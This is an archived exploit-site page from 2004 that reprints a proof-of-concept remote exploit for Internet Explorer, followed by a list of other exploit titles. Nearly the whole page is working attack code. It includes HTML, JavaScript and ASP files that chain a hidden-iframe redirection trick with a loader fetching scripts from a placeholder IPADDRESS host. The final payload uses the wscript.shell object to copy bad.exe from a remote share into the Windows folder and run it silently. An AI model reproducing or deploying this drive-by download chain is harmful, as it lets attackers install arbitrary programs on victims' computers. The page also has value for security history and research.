exploits , vulnerabilities , articles , Microsoft Internet Explorer Remote Wscript.Shell Exploit

2004-07-13

Microsoft Internet Explorer Remote Wscript.Shell Exploit

Proof of Concept Exploit by Ferruh Mavituna
Solution : The IEFix.reg registry file will protect you from this new
variant/exploit

----------------------------------------------------- default.htm
--------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;
dialogWidth:1\;").
location="vbscript:\"<SCRIPT
SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()')
",101);
document.write('<IFRAME ID=myiframe NAME=myiframe
SRC="redir.asp" style=display:none;>
</IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm
---------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js
-------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT
SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200>
</IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js
------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script
language=
"JScript" DEFER>var
rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var
wF="%windir%
\\\\_tmp.exe";var o=new ActiveXObject("wscript.shell");var
e="%comspec% /c copy "+rF+" "+wF;
var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe
src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp
--------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next

Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader
"Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
securitydot.net - 2004-07-13

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit